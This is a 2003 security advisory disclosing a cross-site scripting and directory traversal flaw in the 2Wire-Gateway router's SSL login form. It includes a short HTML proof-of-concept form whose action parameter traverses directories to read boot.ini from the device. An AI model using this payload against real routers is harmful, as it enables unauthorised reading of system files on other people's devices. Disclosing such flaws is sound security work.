Application: 2Wire-Gateway/WebGateway Vendor: http://www.2wire.com Versions: All Platforms: Windows Bug: Cross Site Scripting and Directory traversal bug in SSL Form Authentification Risk: high Exploitation: Remote with browser Date: 25 Dec 2003 Author: Rafel Ivgi, The-Insider e-mail: email@example.com web: http://theinsider.deep-ice.com
1) Introduction 2) Bug 3) The Code
=============== 1) Introduction ===============
2Wire is a communication company that sells internet and network related devices, such as routers. 2Wire most common routers webserver is "2Wire-Gateway". It includes a SSL (Secure Sockets Layer) form authentification.
====== 2) Bug ======
The SSL (Secure Sockets Layer) form authentification has a XSS(Cross Site Scripting) that allows an attacker to change the forms action parameters. An attacker is able to inject script and urls into the forms action an by that Transverse Directories on the server. This allows him to see and download any file in the remote system knowing the path. How ever exploiting this vulnerabillity is very hard because the attacker has to connect to the target through the browser and accept the SSL connection , exploit is very hard to reproduce.
=========== 3) The Code ===========
<form name="wralogin" method="get" action="http://<host>/wra/public/wralogin/?error=61&return=password/../../.. /../boot.ini"> <input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg=="> <center> <input type="password" name="password" value=""> <input type="submit" alt="Submit" width="58" height="19" border="0"></td> </form> </body> </html>
Rafel Ivgi, The-Insider http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."